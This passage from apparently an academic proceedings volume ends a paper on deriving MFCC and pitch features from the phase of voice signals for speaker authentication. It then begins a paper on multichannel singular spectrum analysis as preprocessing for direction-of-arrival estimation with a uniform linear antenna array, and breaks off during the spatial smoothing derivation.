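        seg = seg / (np.max(np.abs(seg)) + 1e-12)         # per-frame normalization
        power = np.abs(np.fft.rfft(seg * win)) ** 2       # FFT block
        logmel = np.log(fb @ power + 1e-12)               # LOG block (mel-filtered)
        coefs.append(dct(logmel, type=2, norm="ortho")[:n_coef])  # DCT instead of IFFT
    return np.array(coefs)                                # shape: (n_frames, 15)
```

The same function can be applied to the corrected phase signal in place of the amplitude signal, which is exactly the comparison made next.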
In this case, each sample included 1024 counts, and the triangular filters covered the analyzed frequency range from 40 Hz to 8 kHz. The gap in the region of sample 75 can be used to divide the word into syllables. It should be noted that the coefficients calculated from the amplitude information are jagged. We process the phase information using the same procedures and estimate the same number of MFCCs. The calculation results are shown in Fig. 8.
Fig. 8. Mel-frequency coefficients calculated from phase information
Comparison of the graphs presented in Figs. 7 and 8 leads to the conclusion that the MFCC coefficients calculated from the phase information are more stable. We now quantify the MFCCs obtained from the amplitude and phase information using the normalized correlation coefficient. The results are shown in Fig. 9. The analysis of the presented dependence shows a high correlation between the MFCC coefficients calculated from the amplitude and phase information. The presented results indicate a high information content of the phase data of the user’s voice signal.
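The per-sample comparison behind Fig. 9 can be sketched as follows (the array names mfcc_amp and mfcc_phase are assumptions for the two coefficient sets):

```python
import numpy as np

def normalized_corr(a, b):
    """Normalized correlation coefficient between two MFCC vectors."""
    a = a - a.mean()
    b = b - b.mean()
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))

# mfcc_amp, mfcc_phase: (n_samples, 15) arrays from the two pipelines (assumed names)
# rho = [normalized_corr(u, v) for u, v in zip(mfcc_amp, mfcc_phase)]  # Fig. 9 curve
```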
Fig. 9. Dependence of the MFCC correlation coefficient on the sample number
5 Conclusions The article considers the problem of improving the quality characteristics of voice authentication systems. As the main direction for solving this problem, it is proposed to use the phase data of the analyzed voice signal in the process of digital processing. The reliability of the proposed solution and the informativeness of the phase data of the voice signal are investigated through experimental evaluation of the pitch frequency and formant information, which are included in the majority of user templates as mandatory parameters. In addition, the cepstral or mel-frequency cepstral coefficients and a number of other attributes are included in the template. The pitch frequency allows solving the following tasks: emotion recognition, gender determination, segmentation of audio with multiple voices, and splitting speech into phrases. In this regard, the work considered the relevant scientific problem of studying new information parameters of the voice signal to refine the estimates of the pitch frequency and other user characteristics. The estimates were refined based on the use of the phase data of the voice signal. Distinctive features of using phase data are the following:
– it allows implementing procedures for preliminary processing of the registration materials, which can significantly improve the quality of user-characteristic evaluation;
– to evaluate attributes from the phase data of a voice signal, the well-known procedures used to process amplitude information can be applied.
The results were obtained in the process of statistical analysis of simulations using the experimental voice data of an authentication system user. The phase data of the voice signal allow one to obtain adequate and reliable estimates, both in spectral analysis and in the estimation of mel-frequency cepstral coefficients. It is advisable to continue research in the direction of evaluating the quality of forming other attributes traditionally used in user templates, taking into account the phase of the voice signal, as well as developing new procedures for forming template elements based on phase data.
References
1. Ramishvili, G.S.: Avtomaticheskoe opoznavanie govoriashego po golosu (Automatic Speaker Recognition over Voice), p. 222. Radio i sviaz, Moscow (1981)
2. Beigi, H.: Fundamentals of Speaker Recognition. Springer, New York (2011). https://doi.org/10.1007/978-0-387-77592-0
3. ISO/IEC 2382-37:2012 Information technology. Vocabulary, Part 37: Biometrics
4. Bolle, R., Connell, J.H., Pankanti, S., Ratha, N.K., Senior, A.W.: Guide to Biometrics. Springer, New York (2004). https://doi.org/10.1007/978-1-4757-4036-3
5. Ifeachor, E.C., Jervis, B.W.: Digital Signal Processing. A Practical Approach, 2nd edn. Pearson Education Limited, New York (1993, 2002)
6. Oppenheim, A.V., Lim, J.S.: The importance of phase in signals. Proc. IEEE 69(5), 529–541 (1981). https://doi.org/10.1109/PROC.1981.12022
7. Paliwal, K.: Usefulness of phase in speech processing. In: Proceedings of the IPSJ Spoken Language Processing Workshop, Gifu, Japan, pp. 1–6 (2003). http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.212.5125&rep=rep1&type=pdf
8. Paliwal, K., Atal, B.: Frequency-related representation of speech. In: Proceedings of the European Conference on Speech Communication and Technology (EUROSPEECH-2003), pp. 65–68 (2003). https://maxwell.ict.griffith.edu.au/spl/publications/papers/euro03_atal.pdf
9. Borisenko, S.Yu., Vorobiev, V.I., Davidov, A.G.: Sravnenie nekotorykh sposobov analiza fazovikh sootnoshenii mejdu kvazigarmonicheskimi sostavliaushimi rechevykh signalov (Comparison of some methods for analyzing the phase relationships between the quasi-harmonic components of speech signals). In: Proceedings of the First All-Russian Acoustic Conference, pp. 2–7 (2004)
10. Wu, Z., Kinnunen, T., Chng, E., Li, H., Ambikairajah, E.: A study on spoofing attack in state-of-the-art speaker verification: the telephone speech case. In: Proceedings of the Asia-Pacific Signal Information Processing Association Annual Summit and Conference (APSIPA ASC) (2012)
11. Sorokin, V.N., Viugin, V.V., Tananikin, A.A.: Raspoznavanie lichnosti po golosu: analiticheskii obzor (Speaker recognition over voice: analytical overview). Inform. Protsessi 12(1), 1–30 (2012)
12. Tirumala, S.S., Shahamiri, S.R., Garhwal, A.S., Wang, R.: Speaker identification features extraction methods: a systematic review. Expert Syst. Appl. 90, 250–271 (2017)
13. Broeders, T.: Forensic speech and audio analysis forensic linguistics. In: Proceedings 13th INTERPOL Forensic Science Symposium, Lyon, France, 16–19 October 2001, vol. D2, pp. 54–84 (2001). https://ssrn.com/abstract=2870568
14. Fergani, B., Davy, M., Houacine, A.: Speaker diarization using one-class support vector machines. Speech Commun. 50, 355–365 (2008). https://doi.org/10.1016/j.specom.2007.11.006
15. Kuwabara, H., Sagisaka, Y.: Acoustic characteristics of speaker individuality: control and conversion. Speech Commun. 16, 165–173 (1995). https://doi.org/10.1016/0167-6393(94)00053-D
16. Sorokin, V.N., Tsyplikhin, A.I.: Speaker verification using the spectral and time parameters of voice signal. J. Commun. Technol. Electron. 55(12), 1561–1574 (2010). https://doi.org/10.1134/S1064226910120302
17. Matsumoto, H., Hiki, S., Sone, T., Nimura, T.: Multidimensional representation of personal quality of vowels and its acoustical correlates. IEEE Trans. Audio Electroacoust. AU-21, 428–436 (1973). https://doi.org/10.1109/TAU.1973.1162507
18. Shriberg, E., Ferrer, L., Kajarekar, S., Venkataraman, A., Stolcke, A.: Modeling prosodic feature sequences for speaker recognition. Speech Commun. 46(3–4), 455–472 (2005). https://doi.org/10.1016/j.specom.2005.02.018
19. Lavner, Y., Gath, I., Rosenhouse, J.: The effects of acoustic modifications on the identification of familiar voices speaking isolated vowels. Speech Commun. 30, 9–26 (2000). https://doi.org/10.1016/S0167-6393(99)00028-X
20. Takemoto, H., Adachi, S., Kitamura, T., Mokhtari, P., Honda, K.: Acoustic roles of the laryngeal cavity in vocal tract resonance. J. Acoust. Soc. Am. 120, 2228–2239 (2006). https://doi.org/10.1121/1.2261270
21. Davis, S., Mermelstein, P.: Comparison of parametric representations for monosyllabic word recognition in continuously spoken sentences. IEEE Trans. Acoust. Speech Signal Process. 28(4), 357–366 (1980). https://doi.org/10.1109/TASSP.1980.1163420
22. Itoh, K.: Perceptual analysis of speaker identity. In: Saito, S. (ed.) Speech Science and Technology, pp. 133–145. IOS Press (1992)
23. Huang, X., Acero, A., Hon, H.-W.: Spoken Language Processing: A Guide to Theory, Algorithm, and System Development. Prentice-Hall, New Jersey (2001)
24. Lu, X., Dang, J.: An investigation of dependencies between frequency components and speaker characteristics for text-independent speaker identification. Speech Commun. 50(4), 312–322 (2007)
25. Reynolds, D.: Speaker identification and verification using Gaussian mixture speaker models. Speech Commun. 17, 91–108 (1995)
26. Reynolds, D., Quatieri, T., Dunn, R.: Speaker verification using adapted Gaussian mixture models. Digit. Signal Process. 10(1), 19–41 (2000)
27. Vapnik, V.N.: Statistical Learning Theory. Wiley, New York (1998)
28. BenZeghiba, M., Bourlard, H.: On the combination of speech and speaker recognition. In: Proceedings of the Eighth European Conference on Speech Communication and Technology (Eurospeech), pp. 1361–1364 (2003)
29. Bimbot, F., et al.: An overview of the CAVE project research activities in speaker verification. Speech Commun. 31, 155–180 (2000)
30. Belousova, Ye.E., Pastushenko, N.C., Pastushenko, O.N.: Analiz chastoti diskretizatsii na kachestvo formirovaniia kvadraturnoi sostavliaiushchei analiticheskogo signala (Analysis of the sampling rate effect on the quality of quadrature component formation of the analytic signal). Vostochno-Evropeiskii J. Peredovikh tekhnol. 1/9(61), 8–13 (2013)
31. Pastushenko, M., Pastushenko, V., Pastushenko, O.: Specifics of receiving and processing phase information in voice authentication systems. In: 2019 International Scientific-Practical Conference Problems of Infocommunications. Science and Technology (PIC S&T), Kyiv, Ukraine, pp. 621–624 (2019)
Sensor Array Signal Processing Using SSA Volodymyr Vasylyshyn(B) Kharkiv National Air Force University, Kharkiv, Ukraine [email protected]
Abstract. In this paper, the adaptive singular spectrum analysis (SSA) method is extended to the multiple-channel case (to signal processing in an antenna array). In the considered case, the trajectory matrix traditionally formed in SSA-like approaches has a block-Hankel form. The embedding process (which consists in selecting parts of the data vector to form the data matrix) is explained using so-called selection matrices, which are used in spatial smoothing methods and in ESPRIT (estimation of signal parameters via rotational invariance technique)-like methods. The relationship between the vector smoothing operator used in antenna array signal processing and the embedding process is also shown. A truncated singular value decomposition is used in the proposed technique. The situations when the sources have different directions of arrival (DOAs) and different or identical frequencies are considered in the paper. Preprocessing performed by SSA-like methods improves the performance of DOA estimation. The approach can be extended to joint DOA and frequency estimation when using a linear antenna array, to 2-D DOA estimation with a rectangular (circular) antenna array, and to noise reduction in speech using a microphone array. Improved DOA estimates can be used for subsequent signal reconstruction. A comparison of the proposed technique with another noise reduction method (total least squares) is performed. An improved noise variance estimate is used within the framework of the considered approach. Simulation results demonstrate the improved performance of the subspace-based technique used with the proposed approach. Keywords: spatial spectral analysis · adaptive Singular Spectrum Analysis · antenna array signal processing · superresolution methods
1 Introduction The characteristics and efficiency of modern radar and communication systems depend on many factors, including the modulation type of the signals, the application of spatial (time, frequency, polarization) diversity, and so on [1–7]. However, probably the most significant factor is the application of an antenna array and, accordingly, of antenna array signal processing. In contrast to traditional systems, where time-domain signal processing is performed, systems with an antenna array can perform space-time signal processing. Nowadays, space-time signal processing methods such as precoding, beamforming, and space-time block coding, related to modern technologies such as MIMO (multiple input-multiple output), are widely used in practice. MIMO
techniques have been widely used in the IEEE standards 802.11n, 802.16e, 802.16m, 802.20, and 802.22. Furthermore, MIMO is realized in the Starlink satellite communication system. In speech processing, the use of an array of microphones is a basis for the realization of modern noise reduction methods [8]. Vector antenna elements (composed, for example, of collocated dipoles and loops) make it possible to estimate the directions of arrival (DOA) of signals and their polarization. Nowadays antenna arrays are widely used in ground-based and airborne (satellite-borne) radar systems and in modern communication systems (LTE (long-term evolution), 6G). In communication systems, the realization of massive MIMO relies on digital antenna arrays. The Thuraya and Starlink satellite communication systems are examples of systems with digital beamforming (DBF) and digital antenna arrays [9, 10]. Adaptive antenna arrays and smart arrays are widely used in radar and communication systems. For example, in a communication system with OFDM (orthogonal frequency division multiplexing), an adaptive antenna improves the performance of the system. In such a system, multiplication of the signal by the weighting vector is possible before and after the fast Fourier transform. Smart antennas and beamforming techniques are of interest in mobile ad hoc networks [2–5]. The MIMO eigenmode transmission system is optimal in the sense of maximizing the MIMO capacity. Eigenbeamformers are used in the receiver and transmitter of such a MIMO system, respectively [6]. Antennas with orthogonal polarizations form two parallel channels over the same link. In order to reduce cross-polarization interference in such systems, Cross-Polarization Interference Cancellation (XPIC) technology is used. The frequency diverse array (FDA) concept was recently proposed for wireless communication and radar [11]. The generation of a range-angle-dependent transmit beam pattern in an FDA antenna is related to a small frequency increment across the array elements, as opposed to the phased-array antenna. Antenna arrays are usually used on the physical layer of the open systems interconnection (OSI) model. Directional antennas in mobile ad hoc networks offer significant potential throughput gains compared to omnidirectional antennas. Directional medium-access-control (MAC) protocols can be realized with directional antennas, and superresolution methods can be used in such applications. A MAC protocol for wireless ad hoc networks with an adaptive antenna array in multipath environments is known [4]. Here the antenna array is used for beamforming on the transmitter and receiver sides with the purpose of increasing spatial reuse. This aim is attained by directing nulls at active transmitters and receivers in the operation area. The effectiveness of antenna array signal processing can be improved in many ways, the main ones being presented in Fig. 1. The possible ways of aperture extension include the following variants [5, 6, 12]:
minimum redundancy array; co-prime array; subarray-based array configuration; aperture extrapolation.
However, in most cases aperture extension gives rise to the problem of ambiguity resolution.
Fig. 1. The main directions of improving the performance of signal processing in antenna arrays
In various signal processing applications it is important to appropriately modify a given data set so that the resulting data set possesses some prescribed properties. The properties are selected in such a way as to allow identification of the useful signals contained in the data set. Data set modification serves as a cleaning process whereby noise is reduced. Current approaches to data set modification, or noise reduction methods, include the data adaptive signal estimation approach [13], Cadzow's signal enhancement technique [14] and its modifications, the original singular spectrum analysis (SSA) and modifications of this approach [15–19], wavelet thresholding, empirical mode decomposition, surrogate data technology [20], and other approaches from nonlinear dynamics. Compressive sensing or compressive sampling (CS) is a novel sensing/sampling paradigm [7] that reconstructs a signal using fewer samples than required by the Nyquist–Shannon sampling theorem.
Selection of the basis [6] is an important issue in antenna array signal processing. In the context of spectral analysis, signal forming in OFDM systems, reduced-rank space-time adaptive processing, and beamforming (precoding), the eigenbasis is very useful. It is related to the Karhunen-Loeve transformation and can be formed based on the eigendecomposition (EVD) of the covariance matrix (CM) of the data or the singular value decomposition (SVD) of the data matrix. However, as alternatives, the power basis, which uses the powers of the CM, a basis obtained using the discrete Fourier transform (DFT), a basis based on discrete prolate spheroidal sequences (DPSS), or Walsh or Haar function bases can be used. The Gram-Schmidt transformation can be very useful in the process of basis forming. Beamforming and precoding are very useful in modern communication systems with MIMO and OFDM and will remain useful in future technologies. In the case of beamforming and precoding, the SVD of the channel matrix is used. Resampling of data is very useful in situations with a small number of data snapshots. The best-known resampling approaches include jackknifing, the bootstrap, pseudonoise resampling, and the surrogate data approach [7, 20]. Higher-order cumulants preserve the performance of the system in the case of non-Gaussian signals corrupted by additive Gaussian noise [21]. The main motivation relies on the fact that the higher-order cumulants of Gaussian processes are identically zero. In other words, in the case of non-Gaussian signals with additive Gaussian noise, an a priori estimate of the noise covariance matrix is unnecessary. Information about the structure of the CM is very important and useful in many applications [6, 14, 19]. Application of the knowledge of the CM structure, together with methods (or algorithms) exploiting such structure, results in more effective estimators for the important cases of small signal-to-noise ratios and small samples. Besides the Toeplitz-structured CM, the persymmetric CM is used. Reduced-dimension beamspace transformation is realized using the DFT, DPSS, and so on [6]. In order to obtain a reduced dimension when performing a beamspace transformation, preliminary information is needed. For a beamspace transformation in the DOA estimation situation, information about the coarse sector of the source DOA estimates is required. The main advantage of beamspace processing is the reduction of the computational complexity of DOA estimation. Application of the beamspace concept to MIMO (including channel estimation, beamspace precoding, and millimeter-wave (mm-wave) technologies) is discussed in the technical literature [5–7]. In many signal processing applications it is necessary to manipulate quantities whose elements are addressed by more than two indices. These higher-order equivalents of vectors and matrices are named higher-order tensors [22–24]. Tensor representation gives the possibility to exploit the structure inherent in the data more efficiently. Parallel factor decomposition is a decomposition of higher-order tensors into rank-1 terms. A multilinear generalization of the SVD and a multilinear SVD for structured tensors (Hankel tensors, for example) are known. Tensor algebra is also applied to spatial smoothing, channel sounding, and source separation. The higher-order SVD and exploitation of the data structure lead to improvement of signal processing efficiency (i.e. parameter estimation and so on).
Expected-likelihood CM estimates [25], as compared to traditional maximum-likelihood (ML) estimates, enhance adaptive detection and DOA estimation
performance. A CM with the "closest possible" likelihood ratio to the one generated by the exact (true) CM is used for estimation and detection. Constant modulus algorithms [6] exploit the constant modulus property of the desired communication signals (e.g. FM (frequency modulated) and PM (phase modulated) signals in the analog domain, and FSK (frequency shift keying), PSK (phase shift keying), and 4-QAM (quadrature amplitude modulation) for digital signals) and other signals. They are used for blind beamforming, equalization, and multiuser detection. Furthermore, the cyclostationarity of communication signals is frequently used to improve the performance of communication systems. Nowadays, application of such properties of communication signals together with OFDM technology is assumed for Starlink. Polarization-time signal processing is an important reserve in signal processing. It is used in MIMO and for parameter estimation, such as time delay estimation (for multipath mitigation) and estimation of DOA and polarization parameters using a polarization-sensitive array. Coherent processing (when the information about the phase of the signal (pulse) is used) improves the SNR in many cases in radar (in the moving-target indication mode) and communication systems [1, 6]. Combined estimation for improving the performance of DOA estimation was initially proposed by A. Gershman [6]. It is also used in pattern recognition. Combined estimation can be realized using a set of estimation methods with different characteristics, or using one method applied to data obtained by resampling. Outlier identification and correction additionally improve the performance of combined estimation [7]. The spatial time-frequency distribution (STFD) approach assumes application of a matrix of auto- and cross-bilinear distributions of the data observations instead of the traditional CM [26]. For wideband array processing, the traditional way is to present the array outputs as narrowband signals by passing them through a bank of narrowband filters. The DOA information embedded in each band is combined using coherent or incoherent signal subspace methods [1, 6]. Clustering approaches from pattern recognition (hierarchical (agglomerative and divisive) clustering, K-means, and correlation clustering) are widely used to optimize objective functions, segment images, and estimate parameters [7]. Lattice filters are used for space-time adaptive processing, spectral analysis, and channel equalization. Lattice structures are used for factorization of the CM (for example, Cholesky factorization) and prediction of processes [27]. Splines (B-splines) are used for smoothing, interpolation, and low-pass filtering in image and signal processing [28]. SSA is used in many applications related to signal processing problems in communication systems (speech processing, channel estimation), radar, and seismic data applications [29–31]. The extension of SSA to multiple channels (the so-called multichannel SSA (MSSA)) is considered in [15]. In general, the usual steps of traditional SSA (formation of the trajectory matrix by embedding the input data, spectral presentation of the trajectory matrix using the SVD, truncation of the SVD and reconstruction of the clean data matrix (or signal matrix), and hankelisation) also take place in MSSA. The main peculiarity is related to the size of the
formed CM, which for the multichannel case is KM × KM, where M is the number of antenna array elements, K = N − l + 1 is the number of columns of the trajectory matrix for one antenna element, N is the length of the signal sequence, and l is the embedding window. For example, for M = 10, N = 100, l = 50 the size of the corresponding matrix is 510 × 510, and the problem of realizing MSSA in close to real-time mode becomes significant. The latter fact is related to the necessity of calculating the EVD or SVD of this matrix. Therefore, it is of interest to find a generalization of SSA to the multichannel case with reduced computational load as compared to the one mentioned before. It should be noted that the application of a block-Hankel matrix to estimating two-dimensional frequencies by the matrix pencil method was considered in [32]. There, the partition-and-stacking process is used to enhance the rank condition of the data matrix. From the mathematical point of view, this idea is similar to the idea of the moving window (spatial smoothing) used in antenna array signal processing [1, 6, 33–36]. In this paper a generalization and extension of the paper [37] is proposed. The application of adaptive SSA to DOA estimation is considered. A uniform linear array (ULA) is used. The cases with different and with the same signal frequencies are both considered. The spatial smoothing procedure together with SSA is used in the case of signals with the same frequencies. The simulation results confirm the improvement of the DOA estimation performance of the ESPRIT method when SSA is used.
2 Signal Model and Adaptive Multichannel SSA Method

Unlike the previous papers [18, 19], the model of the input signal includes the components that describe the influence of the antenna array. We can express the v-th signal in the following fashion [6, 37]

s_v(n) = ς_v exp(j(ω_v n + ϕ_v)),
(1)
where ς_v is the amplitude of the v-th component, v = 1, ..., V, j = √−1, ω_v = 2π f_v^n, ω_v ∈ [0, π), f_v^n = f_v/f_s is the normalised frequency, f_s is the sampling frequency, and ϕ_v is the phase of the v-th component. Such a signal model is widely used in many applications of radar and communication systems. In some practical situations, particular components can be added. In the case of the received OFDM signal of a low Earth orbit (LEO) satellite such as Starlink, the Doppler shift should be included in the model [9]. We assume that the source signals impinge on a ULA from the directions θ = [θ_1, ..., θ_V]^T, where (·)^T denotes the transposition operator. The ULA consists of M sensors with an inter-element spacing Δ = λ/2, where λ is the wavelength. The M × 1 output signal of the antenna array can be described as

x(n) = As(n) + e(n), n = 1, ..., N.
(2)
This equation corresponds to one snapshot of data corrupted by noise; N snapshots are available for processing. Here A = [a(θ_1), ..., a(θ_V)] is the M × V array response matrix, and s(n) is the signal vector. The components of e(n) are i.i.d., complex Gaussian
distributed with zero mean and variance σ². The signal s(n) and the noise e(n) are uncorrelated. The array steering vector has the form

a(θ) = [1, exp(jϑ), ..., exp(j(M − 1)ϑ)]^T,
(3)
where ϑ = 2πΔ sin θ/λ. The N × M data matrix, which includes the N snapshots obtained using the M antenna elements, has the following form

$$X = [\,x_1 \;\; x_2 \;\; \ldots \;\; x_M\,] = \begin{bmatrix} x_1(1) & x_2(1) & \cdots & x_M(1) \\ x_1(2) & x_2(2) & \cdots & x_M(2) \\ \vdots & \vdots & \ddots & \vdots \\ x_1(N) & x_2(N) & \cdots & x_M(N) \end{bmatrix}, \quad (4)$$
where x_m = [x_m(1) x_m(2) ... x_m(N)]^T is the vector containing the N samples obtained by the m-th antenna element, m = 1, ..., M. It should be noted that, by analogy to (4), the general form of the data matrix X can also be presented as X = [x^T(1) x^T(2) ... x^T(N)]^T. The peculiarity of applying SSA-like methods to an antenna array is that the trajectory matrix is formed for each antenna element. In the case of the m-th antenna element it is given by

$$X_m = \begin{bmatrix} x_m(1) & x_m(2) & \cdots & x_m(K) \\ x_m(2) & x_m(3) & \cdots & x_m(K+1) \\ \vdots & \vdots & \ddots & \vdots \\ x_m(l) & x_m(l+1) & \cdots & x_m(N) \end{bmatrix}, \quad (5)$$

where K = N − l + 1 and l is the embedding dimension (or window parameter). The Hankel form of the l × K data matrix in (5) was also used in such spectral analysis methods as the Prony method [1, 6], the matrix pencil method [32, 35], and the methods of parameter estimation based on shift invariance [38, 39]. In the matrix pencil method the parameter l is named the pencil parameter [32, 35]. The pencil parameter is chosen between N/3 and N/2 for efficient noise filtering. Recommendations on the selection of the embedding parameter (window length) can be found in [17]. A similar problem is related to selecting the length of the subarray for the realization of the spatial smoothing method [40]. There, the size of the subarray is recommended as 0.6(M + 1). S. Reddy and A. Gershman in [41] defined the vector smoothing operator generating overlapping vectors of reduced length from the underlying vector. It can be adapted to the case considered in this paper. The vector smoothing operator VS(·) produces the l × 1 vector

VS(x_m, i, l) = [x_m(i) x_m(i + 1) ... x_m(i + l − 1)]^T.
(6)
Thus, as can be seen from (5), as a result of vector smoothing we obtain K = N − l + 1 different vectors VS(x_m, i, l), i = 1, 2, ..., K. The vector smoothing operator in (6) has the form

VS(x_m, i, l) = I_(i,l) x_m,
(7)
where I_(i,l) is the l × N selection matrix consisting of i − 1 leading zero columns, the l × l identity matrix, and N − l − i + 1 trailing zero columns:

$$I_{(i,l)} = [\,0_1 \;\cdots\; 0_{(i-1)} \;\; I_l \;\; 0_{(i+l)} \;\cdots\; 0_N\,],$$
(8)
where 0_i is the i-th zero column with l rows. The generalization of (5) to all antenna elements allows forming the l × (KM) extended trajectory (block-Hankel) matrix

$$X_{bh} = [\,X_1 \;\; X_2 \;\; \cdots \;\; X_M\,].$$
(9)
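As an illustration of (2)-(5) and (9), the following sketch (not the authors' code; the parameter values are assumptions borrowed from the simulation section below) generates ULA data and forms the block-Hankel matrix:

```python
import numpy as np

def steering_vector(theta, M):
    """ULA steering vector (3) for half-wavelength spacing, delta = lambda/2."""
    vartheta = np.pi * np.sin(theta)            # 2*pi*delta*sin(theta)/lambda
    return np.exp(1j * vartheta * np.arange(M))

def hankel_embed(x, l):
    """Trajectory matrix (5): l x K Hankel matrix, K = N - l + 1."""
    K = len(x) - l + 1
    return np.array([x[i:i + K] for i in range(l)])

rng = np.random.default_rng(0)
M, N, l = 8, 64, 20                              # sensors, snapshots, window
thetas = np.deg2rad([10.0, 14.0])                # source DOAs
freqs = np.array([0.3, 0.313])                   # normalised frequencies
A = np.column_stack([steering_vector(t, M) for t in thetas])
S = np.exp(2j * np.pi * np.outer(freqs, np.arange(N)))   # signals per (1)
noise = (rng.standard_normal((N, M)) + 1j * rng.standard_normal((N, M))) / np.sqrt(2)
X = (A @ S).T + 0.1 * noise                      # N x M data matrix (4)

X_bh = np.hstack([hankel_embed(X[:, m], l) for m in range(M)])   # matrix (9)
print(X_bh.shape)                                # (20, 360): l x (K*M)
```

Note that each column of X_bh equals one vector VS(x_m, i, l) from (6), so the concatenation in (9) is equivalent to applying the selection matrices described next.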
The transformation of the initial data matrix into the extended trajectory matrix can be presented in operator notation in the following way

X_bh = G_H(X),
(10)
where G_H is the hankelisation operator. It should be noted that another form of the block-Hankel trajectory matrix is possible, in which the embedding matrices corresponding to the different elements are stacked:

$$X_{bh} = \begin{bmatrix} X_1 \\ X_2 \\ \vdots \\ X_M \end{bmatrix}. \quad (11)$$

This presentation is an alternative to the form given by (9). Besides the application of the vector smoothing operator, the process of trajectory matrix formation from the input data can be described by so-called selection matrices, which are widely used in digital signal processing. Selection (windowing) matrices describe the process of selecting a part of the data matrix to form the trajectory matrix. It should be noted that selection matrices are used in the description of ESPRIT-like methods, the matrix pencil method, the (forward) spatial smoothing method, the forward-backward spatial smoothing method, image processing, and spatio-frequential smoothing [1, 6, 34]. The selection matrices have the form J_i = [0_{l×(i−1)} I_l 0_{l×(N−l−i+1)}], i = 1, ..., K. Here 0_{l×(i−1)} is the l × (i − 1) zero matrix, and J_i selects a part of the data matrix (a part of the columns of the data matrix). Therefore the trajectory matrix for the m-th antenna element is given by

$$X_m = [\,J_1 x_m \;\; \cdots \;\; J_K x_m\,], \quad m = 1, \ldots, M. \quad (12)$$

The block-Hankel matrix X_bh can be expressed in terms of the SVD in the following way

$$X_{bh} = \sum_{i=1}^{m_y} \eta_i u_i g_i^H. \quad (13)$$
Here η_i is a singular value, u_i and g_i are the left and right singular vectors of the matrix X_bh, and m_y ≤ min{l, KM} is the rank of the matrix. It is known that η_i = √λ_i, where λ_i is the eigenvalue of the CM formed from X_bh. The realization of the proposed approach can be described by the following steps:

Step 1. For each channel data sequence, form the data matrix X_m.
Step 2. Form X_bh and calculate the spectral decomposition of X_bh or of the covariance matrix obtained using X_bh.
Step 3. Estimate the number of sources V̂ using the minimum description length approach and calculate the estimate of the noise variance σ̂_i² [18, 19].
Step 4. Perform the reconstruction step by forming the matrix

$$X_{f.ext} = \sum_{i=1}^{\hat V} (\hat\eta_i - \hat\sigma_i)\,\hat u_i \hat g_i^H.$$
Step 5. Construct the filtered data matrix X_filt by the hankelisation of X_f.ext.
Step 6. Calculate the spectral decomposition of X_filt and estimate the DOAs θ̂_v, v = 1, ..., V, using one of the superresolution methods.
Step 7. End.

The term "adaptive" in the name of the considered approach means that the noise reduction adaptively changes due to the variation of the noise variance estimate when the SNR changes. In order to reduce the computational load of the proposed approach, the Lanczos SVD can be used at Step 2. The possible variants of noise variance estimation are presented in [18, 19]. Step 5 is realized in the traditional way for each component of X_f.ext separately. As a result, the matrix X_filt = [X̃_1 X̃_2 ⋯ X̃_M] is formed, where X̃_i denotes the filtered variant of X_i. Different superresolution methods can be used at Step 6. Due to its simplicity, the subspace-based ESPRIT method is used as the superresolution method for conducting the DOA estimation process. Instead of the ESPRIT method, any known superresolution method can be used, such as MUSIC, Root-MUSIC, Min-norm, MODE, subspace fitting methods, and others. It should be noted that identical signal frequencies cause degradation of the DOA estimation performance of the considered approach. In such cases, the spatial smoothing procedure is used. A graphical explanation of the considered approach is shown in Fig. 2. The components that can be omitted in some cases are depicted by dashed lines. For example, the decorrelation approach (spatial smoothing procedure) is unnecessary for sources with different frequencies. On the other hand, the reconstruction of the signal and the recognition are optional steps. The spatial smoothing method (which is also known as the forward averaging method) is realized by dividing the array into K_sub overlapping subarrays of size L_sub = M − K_sub + 1. The subarrays are shifted relative to each other by one antenna element. In the particular case, the ULA can be considered as consisting of two subarrays of M − 1 antenna elements (Fig. 3). These subarrays are shifted by the interelement distance Δ. The selection matrices for such a situation have the form J_1 = [I_{M−1} 0_{(M−1)×1}] and J_2 = [0_{(M−1)×1} I_{M−1}], where 0_{(M−1)×1} is the (M − 1) × 1 zero vector. A minimal numerical sketch of Steps 2 to 5 is given after this paragraph.
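The following sketch (an illustration under stated assumptions, not the authors' implementation) carries out Steps 2, 4 and 5 on a block-Hankel matrix X_bh such as the one formed in the previous snippet. The noise standard deviation estimate used here, the mean of the trailing singular values, is only one simple variant of the estimates discussed in [18, 19], and V_hat is assumed known from Step 3.

```python
import numpy as np

def adaptive_ssa_denoise(X_bh, V_hat, M):
    """Steps 2, 4, 5: SVD, adaptive rank-V_hat reconstruction, hankelisation."""
    l, KM = X_bh.shape
    K = KM // M
    U, eta, Gh = np.linalg.svd(X_bh, full_matrices=False)      # Step 2
    sigma_hat = eta[V_hat:].mean()             # one simple noise-level variant
    # Step 4: truncate the SVD and subtract the noise level from the
    # retained singular values (singular value adaptation)
    X_fext = (U[:, :V_hat] * (eta[:V_hat] - sigma_hat)) @ Gh[:V_hat, :]
    # Step 5: hankelise each l x K block by averaging over its anti-diagonals
    X_filt = np.empty_like(X_fext)
    for m in range(M):
        B = X_fext[:, m * K:(m + 1) * K]
        Hm = np.zeros_like(B)
        for s in range(l + K - 1):                   # anti-diagonal index
            idx = [(i, s - i) for i in range(l) if 0 <= s - i < K]
            av = np.mean([B[i, j] for i, j in idx])
            for i, j in idx:
                Hm[i, j] = av
        X_filt[:, m * K:(m + 1) * K] = Hm
    return X_filt
```

The filtered matrix X_filt (or a data matrix reconstructed from it) is then passed to the superresolution step (Step 6).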
Fig. 2. Application of SSA-based denoising preprocessing to DOA estimation
The output signal of the k-th subarray, k = 1, ..., K_sub, x_k(n) = [x_k(n), x_{k+1}(n), ..., x_{k+L_sub−1}(n)]^T, can be expressed as [6, 36]

x_k(n) = A_sub D_k s(n) + e_k(n),
(14)
where A_sub is the L_sub × V matrix of steering vectors of the k-th subarray, and D_k = diag(e^{jϑ_1(k−1)}, ..., e^{jϑ_V(k−1)}) is the V × V diagonal matrix of phase shifts. The phase shifts arise because of the shift of the subarray. It can be shown that the CM of x_k has the form R_kk = A_sub D_k S D_k^H A_sub^H + σ²I. The L_sub × L_sub spatially smoothed CM R̃ is obtained by averaging the CMs of the subarrays in the following way

$$\tilde R = \frac{1}{K_{sub}} \sum_{k=1}^{K_{sub}} R_{kk}. \quad (15)$$
The spatially smoothed CM can also be obtained from the original CM R using the selection matrices J_k = [0_{L_sub×(k−1)} I_{L_sub} 0_{L_sub×(M−L_sub−k+1)}]:

